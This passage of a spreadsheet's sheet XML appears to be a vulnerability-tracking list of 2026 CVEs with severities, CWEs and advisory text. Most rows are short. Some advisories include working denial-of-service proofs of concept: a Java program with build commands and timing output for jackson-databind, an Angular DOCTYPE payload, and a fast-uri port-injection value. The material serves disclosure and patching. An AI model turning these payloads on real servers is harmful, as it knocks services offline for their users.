      <c r="R139" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S139" s="5" t="inlineStr">
        <is>
          <t>An authenticated LimeSurvey Community Edition 7.3.0 user allowed to create surveys can use their own survey as an authorized context while supplying question or answer identifiers belonging to another user's survey. The REST survey-patching endpoint checks the attacker's permission against the survey ID in the request URL, but the vulnerable persistence operations resolve the target object independently by its global qid or aid and never verify that it belongs to that authorized survey.</t>
        </is>
      </c>
      <c r="T139" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97685</t>
        </is>
      </c>
    </row>
    <row r="140">
      <c r="A140" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B140" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C140" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100392</t>
        </is>
      </c>
      <c r="D140" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E140" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F140" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G140" s="5" t="inlineStr"/>
      <c r="H140" s="5" t="inlineStr"/>
      <c r="I140" s="5" t="inlineStr"/>
      <c r="J140" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K140" s="5" t="inlineStr"/>
      <c r="L140" s="5" t="inlineStr"/>
      <c r="M140" s="5" t="inlineStr"/>
      <c r="N140" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O140" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P140" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q140" s="5" t="inlineStr"/>
      <c r="R140" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S140" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. In version 1.7.2, Users::form() performs no object-level authorization check on user_id = 1. A Secondary Administrator (user_type = 1, user_id != 1) can rewrite the Primary Administrator's user_type to 2 (Guest / read-only), destroying the root account's privilege and locking the legitimate owner out of the instance. At time of publication, there are no publicly available patches.</t>
        </is>
      </c>
      <c r="T140" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100392</t>
        </is>
      </c>
    </row>
    <row r="141">
      <c r="A141" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B141" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C141" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101898</t>
        </is>
      </c>
      <c r="D141" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E141" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F141" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G141" s="5" t="inlineStr"/>
      <c r="H141" s="5" t="inlineStr"/>
      <c r="I141" s="5" t="inlineStr"/>
      <c r="J141" s="5" t="inlineStr">
        <is>
          <t>node.js, axios, requests</t>
        </is>
      </c>
      <c r="K141" s="5" t="inlineStr"/>
      <c r="L141" s="5" t="inlineStr"/>
      <c r="M141" s="5" t="inlineStr"/>
      <c r="N141" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O141" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P141" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q141" s="5" t="inlineStr"/>
      <c r="R141" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S141" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise-based HTTP client for the browser and Node.js. From 1.13.0 until 1.20.0, Axios HTTP/2 request setup does not consistently apply proxy settings and caller-supplied DNS lookup policy. An HTTPS request uses httpVersion: 2 with explicit config.proxy or environment-derived proxy settings, or relies on caller-supplied config.lookup DNS policy. The HTTP/2 path can connect without the configured proxy behavior or without applying the caller-supplied config.lookup policy before http2.connect(). Requests can bypass the intended proxy route or the caller-supplied DNS resolution policy. This issue is fixed in version 1.20.0.</t>
        </is>
      </c>
      <c r="T141" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101898</t>
        </is>
      </c>
    </row>
    <row r="142">
      <c r="A142" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B142" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C142" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101907</t>
        </is>
      </c>
      <c r="D142" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E142" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F142" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G142" s="5" t="inlineStr"/>
      <c r="H142" s="5" t="inlineStr"/>
      <c r="I142" s="5" t="inlineStr"/>
      <c r="J142" s="5" t="inlineStr">
        <is>
          <t>node.js, axios, gin</t>
        </is>
      </c>
      <c r="K142" s="5" t="inlineStr"/>
      <c r="L142" s="5" t="inlineStr"/>
      <c r="M142" s="5" t="inlineStr"/>
      <c r="N142" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O142" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P142" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q142" s="5" t="inlineStr"/>
      <c r="R142" s="5" t="inlineStr">
        <is>
          <t>CWE-441, CWE-601</t>
        </is>
      </c>
      <c r="S142" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise-based HTTP client for the browser and Node.js. From 1.17.0 until 1.20.0, the fetch adapter bypasses the maxRedirects: 0 redirect policy. An Axios request uses the fetch adapter with maxRedirects set to zero and receives a redirect response. The underlying fetch implementation follows the redirect instead of returning the redirect response unchanged. The redirected request can access internal responses or reach state-changing internal endpoints despite redirects being disabled. This issue is fixed in version 1.20.0.</t>
        </is>
      </c>
      <c r="T142" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101907</t>
        </is>
      </c>
    </row>
    <row r="143">
      <c r="A143" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B143" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C143" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102010</t>
        </is>
      </c>
      <c r="D143" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E143" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F143" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G143" s="5" t="inlineStr"/>
      <c r="H143" s="5" t="inlineStr"/>
      <c r="I143" s="5" t="inlineStr"/>
      <c r="J143" s="5" t="inlineStr"/>
      <c r="K143" s="5" t="inlineStr"/>
      <c r="L143" s="5" t="inlineStr"/>
      <c r="M143" s="5" t="inlineStr"/>
      <c r="N143" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O143" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P143" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q143" s="5" t="inlineStr"/>
      <c r="R143" s="5" t="inlineStr">
        <is>
          <t>CWE-825</t>
        </is>
      </c>
      <c r="S143" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in GCC. When an application calls the erase_if function on a binary heap priority queue in libstdc++, the library reallocates storage but fails to update its internal entry pointer. An attacker capable of triggering this operation can exploit this use-after-free condition, leading to a Denial of Service (DoS) via an application crash or potential memory corruption.</t>
        </is>
      </c>
      <c r="T143" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102010</t>
        </is>
      </c>
    </row>
    <row r="144">
      <c r="A144" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B144" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C144" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80357</t>
        </is>
      </c>
      <c r="D144" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E144" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F144" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G144" s="5" t="inlineStr"/>
      <c r="H144" s="5" t="inlineStr"/>
      <c r="I144" s="5" t="inlineStr"/>
      <c r="J144" s="5" t="inlineStr">
        <is>
          <t>dell</t>
        </is>
      </c>
      <c r="K144" s="5" t="inlineStr"/>
      <c r="L144" s="5" t="inlineStr"/>
      <c r="M144" s="5" t="inlineStr"/>
      <c r="N144" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O144" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P144" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q144" s="5" t="inlineStr"/>
      <c r="R144" s="5" t="inlineStr">
        <is>
          <t>CWE-1191</t>
        </is>
      </c>
      <c r="S144" s="5" t="inlineStr">
        <is>
          <t>Dell Boot Optimized Server Storage (BOSS), versions prior to 2.2.13.2038, contains an On-Chip Debug and Test Interface With Improper Access Control vulnerability in the SMCU on 17G BOSS-N1 controllers. An unauthenticated attacker with physical access could potentially exploit this vulnerability, leading to Unauthorized access.</t>
        </is>
      </c>
      <c r="T144" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80357</t>
        </is>
      </c>
    </row>
    <row r="145">
      <c r="A145" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B145" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C145" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101895</t>
        </is>
      </c>
      <c r="D145" s="5" t="inlineStr"/>
      <c r="E145" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F145" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G145" s="5" t="inlineStr"/>
      <c r="H145" s="5" t="inlineStr"/>
      <c r="I145" s="5" t="inlineStr"/>
      <c r="J145" s="5" t="inlineStr">
        <is>
          <t>npm, angular</t>
        </is>
      </c>
      <c r="K145" s="5" t="inlineStr"/>
      <c r="L145" s="5" t="inlineStr">
        <is>
          <t>npm:@angular/platform-server</t>
        </is>
      </c>
      <c r="M145" s="5" t="inlineStr">
        <is>
          <t>20.3.31, 21.2.23, 22.1.6</t>
        </is>
      </c>
      <c r="N145" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O145" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P145" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q145" s="5" t="inlineStr"/>
      <c r="R145" s="5" t="inlineStr"/>
      <c r="S145" s="5" t="inlineStr">
        <is>
          <t>A Denial of Service (DoS) vulnerability exists in `@angular/platform-server`'s DOM emulation parser (`domino`). When processing untrusted user input containing an incomplete DOCTYPE declaration ending with whitespace before EOF (such as `&lt;!DOCTYPE html `), the HTML parser enters an infinite synchronous loop, pegging CPU utilization at 100% and completely freezing the Node.js server process.
### Technical Description
In Angular Server-Side Rendering (SSR), `@angular/platform-server` uses `domino` to parse and sanitize HTML bound through template bindings (such as `[innerHTML]`) or manipulated via DOM APIs.
In Domino's HTML parser (`lib/HTMLParser.js`), tokenizer states that specify fixed lookahead—such as `after_doctype_name_state` (`lookahead = 6`)—rely on the state handler function to explicitly advance the character index pointer (`nextchar`). While branches for whitespace, `&gt;`, and keyword matching advance `nextchar`, the EOF branch (`case -1: // EOF`) emitted doctype and EOF tokens without advancing `nextchar` or transitioning out of the state:
```javascript
case -1: // EOF
  forcequirks();
  emitDoctype();
  emitEOF();
  break;
```
Because `nextchar` remained unchanged pointing to the EOF marker character (`\uFFFF`), the scanner loop (`while (nextchar &lt; numchars)`) repeatedly re-invoked `after_doctype_name_state` with `codepoint = EOF` indefinitely. In Node.js's single-threaded runtime, this synchronous loop starves the event loop entirely.
### Impact &amp; Reachability
* **Reachability**: The vulnerability is reachable in any Angular SSR application where untrusted user input is bound to `[innerHTML]`, interpolated into markup, or sanitized on the server.
* **Impact**: Successful exploitation allows an unauthenticated remote attacker to cause an immediate Denial of Service (DoS) by sending a payload containing an incomplete DOCTYPE (e.g., `&lt;!DOCTYPE html `). The Node.js SSR process locks up at 100% CPU and ceases responding to all concurrent and subsequent HTTP requests.
**Proof of Concept:**
```ts
import { Component } from '@angular/core';
@Component({
  selector: 'app-root',
  standalone: true,
  template: `&lt;div [innerHTML]="payload"&gt;&lt;/div&gt;`,
})
export class AppComponent {
  // Attacker-controlled input containing an incomplete DOCTYPE ending with whitespace
  payload = '&lt;!DOCTYPE html ';
}
```
### Workarounds
* Avoid binding untrusted user input directly to `[innerHTML]` in server-rendered templates; use standard text interpolation (`{{ userInput }}`) or `[textContent]` when raw HTML rendering is not required.
* Validate or sanitize user input before passing it to `[innerHTML]` on the server by stripping or rejecting strings matching `/^&lt;!DOCTYPE/i`.</t>
        </is>
      </c>
      <c r="T145" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101895</t>
        </is>
      </c>
    </row>
    <row r="146">
      <c r="A146" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B146" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C146" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68497</t>
        </is>
      </c>
      <c r="D146" s="5" t="inlineStr"/>
      <c r="E146" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F146" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G146" s="5" t="inlineStr"/>
      <c r="H146" s="5" t="inlineStr"/>
      <c r="I146" s="5" t="inlineStr"/>
      <c r="J146" s="5" t="inlineStr">
        <is>
          <t>jackson, jackson-databind, fasterxml, maven</t>
        </is>
      </c>
      <c r="K146" s="5" t="inlineStr"/>
      <c r="L146" s="5" t="inlineStr">
        <is>
          <t>Maven:com.fasterxml.jackson.core:jackson-databind, Maven:tools.jackson.core:jackson-databind</t>
        </is>
      </c>
      <c r="M146" s="5" t="inlineStr">
        <is>
          <t>2.18.10, 2.21.6, 2.22.2, 3.1.6, 3.2.2</t>
        </is>
      </c>
      <c r="N146" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O146" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P146" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q146" s="5" t="inlineStr"/>
      <c r="R146" s="5" t="inlineStr"/>
      <c r="S146" s="5" t="inlineStr">
        <is>
          <t>### Summary
`jackson-databind` 3.2.1 deserializes a JSON **string** bound to a `javax.xml.datatype.Duration` or `javax.xml.datatype.XMLGregorianCalendar` field by passing the raw string verbatim to `DatatypeFactory.newDuration(value)` / `newXMLGregorianCalendar(value)`. Per the XML-Schema lexical grammar these factory methods accept numeric components of arbitrary length, which the JDK materializes into `java.math.BigInteger` / `BigDecimal` using the native `BigInteger(String)` constructor (an O(n²) parser). Because the digits reside inside a JSON **string** token, jackson-core's `StreamReadConstraints.maxNumberLength` guard (which bounds only JSON *number* tokens) never fires, so there is no length limit anywhere on this path. An unauthenticated attacker can submit a single small request (e.g. ~1–5 MB) that forces tens of seconds to minutes of single-thread CPU consumption, yielding a denial of service under the default `JsonMapper.builder().build()` mapper with no polymorphic typing or special configuration.
### Details
`StreamReadConstraints.maxNumberLength` (jackson-core, default 1000) bounds the **text length of JSON number tokens** only; it does not apply to digits inside a JSON string token (`maxStringLength` default is 100,000,000). jackson's own value binders compensate for this gap elsewhere — `NumberDeserializers` explicitly call `streamReadConstraints().validateIntegerLength(text.length())` / `validateFPLength(text.length())` before parsing a *stringified* number (`NumberDeserializers.java:1063`, `:1139`). The XML-datatype deserializer omits this identical pre-check.
`CoreXMLDeserializers` registers `Std` deserializers **by default** for any field typed `javax.xml.datatype.Duration` or `XMLGregorianCalendar` (`findBeanDeserializer`), with no opt-in required. `Std._deserialize` hands the attacker string straight to the datatype factory:
```java
protected Object _deserialize(String value, DeserializationContext ctxt) {
    switch (_kind) {
    case TYPE_DURATION:
        return _dataTypeFactory.newDuration(value);                 // attacker lexical string
    case TYPE_G_CALENDAR:
        Date d;
        try { d = _parseDate(value, ctxt); }
        catch (DatabindException e) {
            return _dataTypeFactory.newXMLGregorianCalendar(value); // attacker lexical string
        }
        return _gregorianFromDate(ctxt, d);
    }
    throw new IllegalStateException();
}
```
Per the XSD lexical rules, `newDuration` parses each numeric component (years, months, …) into a `BigInteger`, and `newXMLGregorianCalendar` parses fractional seconds into a `BigDecimal`. The JDK uses the native `BigInteger(String)` / `BigDecimal(String)` constructors, which are O(n²) in the digit count. A short JSON string such as `"P" + "9"×N + "Y"` therefore forces the allocation and O(N²) parse of an N-digit `BigInteger`, entirely downstream of every jackson-core constraint.
## Vulnerable Code Location
- `src/main/java/tools/jackson/databind/ext/CoreXMLDeserializers.java:137`
  — `newDuration(value)` (TYPE_DURATION)
- `src/main/java/tools/jackson/databind/ext/CoreXMLDeserializers.java:147`
  — `newXMLGregorianCalendar(value)` (TYPE_G_CALENDAR fallback)
- Registration (default, no opt-in):
  `src/main/java/tools/jackson/databind/ext/CoreXMLDeserializers.java:42-46`
  (`findBeanDeserializer` returns `Std` for `XMLGregorianCalendar` / `Duration`)
- Contrast — correct length-guard pattern already used elsewhere in the library:
  `src/main/java/tools/jackson/databind/deser/jdk/NumberDeserializers.java:1063,1139`
## Proof of Concept
PoC source (`Vuln07_DurationDoS.java`). It uses only the public `ObjectMapper.readValue` API and a default mapper; the only "special" element is a normal DTO exposing a `javax.xml.datatype.Duration` field.
```java
package com.poc;
import tools.jackson.databind.ObjectMapper;
import tools.jackson.databind.json.JsonMapper;
import javax.xml.datatype.Duration;
/**
 * Vuln 7: Unbounded numeric allocation / CPU DoS via Duration lexical deserialization.
 * A short JSON string forces parsing of a huge BigInteger inside DatatypeFactory.newDuration.
 */
public class Vuln07_DurationDoS {
    public static class Cfg { public Duration ttl; }
    public static void main(String[] args) throws Exception {
        ObjectMapper mapper = JsonMapper.builder().build();
        int digits = Integer.getInteger("digits", 5_000_000);
        // Baseline small parse.
        long t0 = System.nanoTime();
        mapper.readValue("{\"ttl\":\"P1Y\"}", Cfg.class);
        long tBase = System.nanoTime() - t0;
        System.out.println("Baseline (P1Y) parse: " + (tBase/1_000_000) + " ms");
        String big = "P" + "9".repeat(digits) + "Y";
        String json = "{\"ttl\":\"" + big + "\"}";
        System.out.println("Payload JSON size ~ " + json.length() + " bytes (year component = " + digits + " digits)");
        long t1 = System.nanoTime();
        try {
            Cfg c = mapper.readValue(json, Cfg.class);
            long dt = System.nanoTime() - t1;
            System.out.println("Parsed giant Duration in " + (dt/1_000_000) + " ms; years field type materialized as BigInteger");
            System.out.println("RESULT: VULNERABLE - " + digits + "-digit BigInteger parsed from a "
                    + json.length() + "-byte payload (amplified CPU/allocation, StreamReadConstraints bypassed)");
        } catch (Throwable t) {
            long dt = System.nanoTime() - t1;
            System.out.println("After " + (dt/1_000_000) + " ms threw " + t.getClass().getName() + ": " + t.getMessage());
        }
    }
}
```
Minimal HTTP-shaped payload (what an attacker sends):
```json
{ "ttl": "P99999999999999999999…9Y" }   // 'P' + N nines + 'Y', N up to ~100,000,000
```
An `XMLGregorianCalendar` field is equally affected via the fractional-seconds path, e.g.
`{ "at": "0000-01-01T00:00:00." + "9"×N }`.
## Execution Steps
The PoC needs only the three Jackson 3.2.1 jars on the classpath; it can be built and run with plain `javac`/`java` (no Maven required). The jars are the standard published artifacts (here resolved from the local Maven cache `~/.m2`, but any copy works).
```bash
# 0. Locate the three dependency jars (published Maven artifacts).
M2="$HOME/.m2/repository"
DB="$M2/tools/jackson/core/jackson-databind/3.2.1/jackson-databind-3.2.1.jar"
CORE="$M2/tools/jackson/core/jackson-core/3.2.1/jackson-core-3.2.1.jar"
ANN="$M2/com/fasterxml/jackson/core/jackson-annotations/2.22/jackson-annotations-2.22.jar"
CP="$DB:$CORE:$ANN"
#   If not already cached, fetch them once, e.g.:
#   mvn -q dependency:get -Dartifact=tools.jackson.core:jackson-databind:3.2.1
#   (jackson-core 3.2.1 and jackson-annotations 2.22 come as transitive deps)
# 1. Compile with javac (single source file).
mkdir -p out
javac -cp "$CP" -d out src/main/java/com/poc/Vuln07_DurationDoS.java
# 2. Quick confirmation (~11 s): 1,000,000-digit year component.
java -Xmx2g -Ddigits=1000000 -cp "out:$CP" com.poc.Vuln07_DurationDoS
# 3. Full-severity demonstration (~293 s): 5,000,000-digit year component.
java -Xmx2g -Ddigits=5000000 -cp "out:$CP" com.poc.Vuln07_DurationDoS
```
The `digits` system property controls the number of `9` characters in the year component; JSON payload size ≈ digits + 12 bytes. Increase toward the default 100,000,000 `maxStringLength` to scale cost further.
Environment used for the evidence below: jackson-databind 3.2.1, jackson-core 3.2.1, jackson-annotations 2.22; OpenJDK 25 on macOS (darwin), default `JsonMapper.builder().build()`.
## Reproduction Evidence
Deterministic values (payload byte count, resulting bit-length) are exact across runs; timings vary with load. Two independent runs at different sizes:
**digits = 5,000,000 (~5 MB payload):**
```
Baseline (P1Y) parse: 27 ms
Payload JSON size ~ 5000012 bytes (year component = 5000000 digits)
Parsed giant Duration in 293175 ms; years field type materialized as BigInteger
RESULT: VULNERABLE - 5000000-digit BigInteger parsed from a 5000012-byte payload (amplified CPU/allocation, StreamReadConstraints bypassed)
```
**digits = 1,000,000 (~1 MB payload, for fast repeatability):**
```
Baseline (P1Y) parse: 53 ms
Payload JSON size ~ 1000012 bytes (year component = 1000000 digits)
Parsed giant Duration in 11155 ms; years field type materialized as BigInteger
RESULT: VULNERABLE - 1000000-digit BigInteger parsed from a 1000012-byte payload (amplified CPU/allocation, StreamReadConstraints bypassed)
```
Interpretation: a normal `"P1Y"` value parses in tens of milliseconds; a ~1 MB attacker payload consumes **~11 s** and a ~5 MB payload **~293 s** of single-thread CPU — a 5–6 order-of-magnitude amplification. The super-linear growth (≈26× cost for 5× payload) is consistent with the JDK's O(n²) `BigInteger(String)` constructor. The cost occurs inside `DatatypeFactory.newDuration`, downstream of jackson-core's `StreamReadConstraints` (independently confirmed: the same digit sequence supplied as a bare JSON *number* token is rejected with `StreamConstraintsException`, whereas inside a string token it is not bounded).
## Impact
An unauthenticated attacker can stall a request-processing thread for tens of seconds to minutes and allocate a large `BigInteger`/`BigDecimal` from a single small request. Because the cost is CPU-bound and super-linear, a handful of concurrent requests can saturate the server's worker threads and CPU, denying service to all users. The exposure requires only that a bound type expose a `javax.xml.datatype.Duration` or `XMLGregorianCalendar` field  common in applications that ingest XML-schema derived data, SOAP/JAXB-adjacent models, or configuration carrying XSD durations — and fires under the default mapper with no polymorphic typing.
## Recommended Fix
Apply the same validate-length-then-parse idiom the core `NumberDeserializers` already use:
1. In `CoreXMLDeserializers.Std._deserialize`, enforce a maximum raw-string length before
   calling `newDuration(value)` / `newXMLGregorianCalendar(value)` — e.g. reject inputs
   longer than `ctxt.streamReadConstraints().getMaxNumberLength()` (or a dedicated bound),
   routing over-length input through `ctxt.handleWeirdStringValue(...)`.
2. Alternatively, validate the lexical form against a bounded regex and cap the digit count
   of each numeric component before delegating to `DatatypeFactory`.
3. Document that `Duration` / `XMLGregorianCalendar` fields bound from untrusted input must
   be length-limited at the transport layer.</t>
        </is>
      </c>
      <c r="T146" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68497</t>
        </is>
      </c>
    </row>
    <row r="147">
      <c r="A147" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B147" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C147" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84292</t>
        </is>
      </c>
      <c r="D147" s="5" t="inlineStr"/>
      <c r="E147" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F147" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G147" s="5" t="inlineStr"/>
      <c r="H147" s="5" t="inlineStr"/>
      <c r="I147" s="5" t="inlineStr"/>
      <c r="J147" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K147" s="5" t="inlineStr"/>
      <c r="L147" s="5" t="inlineStr">
        <is>
          <t>npm:fast-uri</t>
        </is>
      </c>
      <c r="M147" s="5" t="inlineStr">
        <is>
          <t>2.4.6, 3.1.7, 4.1.4</t>
        </is>
      </c>
      <c r="N147" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O147" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P147" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q147" s="5" t="inlineStr"/>
      <c r="R147" s="5" t="inlineStr"/>
      <c r="S147" s="5" t="inlineStr">
        <is>
          <t>### Impact
`fast-uri` serializes the `port` component of a URI without validating it. When recomposing the authority, `fast-uri` escapes the userinfo and host components but concatenates the port verbatim, so a `port` value that is not a sequence of digits can inject authority delimiters. For example, serializing a component whose `port` is `@127.0.0.1:8124` produces `http://trusted.example:@127.0.0.1:8124/app`, demoting the intended host to userinfo and pointing the authority at an attacker-controlled host. Both `fast-uri` and Node's `URL` read the result back as the attacker's host with no error, so re-validating the built URI does not catch it.
This affects applications that build URIs from parts and assign untrusted data to the `port` component (for example a fixed host from configuration and a port taken from user input or a service record). The same path is reachable through `serialize()`, `normalize()`, and `equal()` in their object forms. A `port` obtained from `parse()` is always digits and is not affected.
### Patches
This vulnerability has been patched in fast-uri `4.1.4`, `3.1.7`, and `2.4.6`. `recomposeAuthority` now rejects any port that is not `*DIGIT` per RFC 3986. All users should upgrade.
### Workarounds
If upgrading is not immediately possible, validate the `port` value against the RFC 3986 grammar (digits only) before passing a component to `serialize()`, `normalize()`, or `equal()`, and reject anything else, for example `if (!/^\d*$/.test(String(port))) throw new Error('invalid port')`.</t>
        </is>
      </c>
      <c r="T147" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84292</t>
        </is>
      </c>
    </row>
    <row r="148">
      <c r="A148" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B148" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C148" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84394</t>
        </is>
      </c>
      <c r="D148" s="5" t="inlineStr"/>
      <c r="E148" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F148" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G148" s="5" t="inlineStr"/>
      <c r="H148" s="5" t="inlineStr"/>
      <c r="I148" s="5" t="inlineStr"/>
      <c r="J148" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K148" s="5" t="inlineStr"/>
      <c r="L148" s="5" t="inlineStr">
        <is>
          <t>npm:fast-uri</t>
        </is>
      </c>
      <c r="M148" s="5" t="inlineStr">
        <is>
          <t>2.4.6, 3.1.7, 4.1.4</t>
        </is>
      </c>
      <c r="N148" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O148" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P148" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q148" s="5" t="inlineStr"/>
      <c r="R148" s="5" t="inlineStr"/>
      <c r="S148" s="5" t="inlineStr">
        <is>
          <t>### Impact
`fast-uri` accepts a host that contains an unbalanced or misplaced authority bracket (`[` or `]`) without reporting an error. A host that starts with `[` but does not end with `]`, such as `[@127.0.0.1`, is neither validated as an IP literal nor canonicalized as a domain name, so `parse()` returns it as the host with `error` undefined, while Node's `URL` (and `http.get`, `axios`, `got`, and other clients built on it) resolve the same string to `127.0.0.1`. An application that reads `parse().host` to make a host decision (an SSRF denylist, a redirect allowlist, or proxy routing) and then passes the original URL to an HTTP client evaluates its policy against a string that is not the host the request reaches. The same host is carried through `normalize()`, `equal()`, and `resolve()`.
### Patches
This vulnerability has been patched in fast-uri `4.1.4`, `3.1.7`, and `2.4.6`. `parse()` now reports `URI host is malformed.` for any host that contains a bracket but is not a valid `[IPv6]` literal. All users should upgrade.
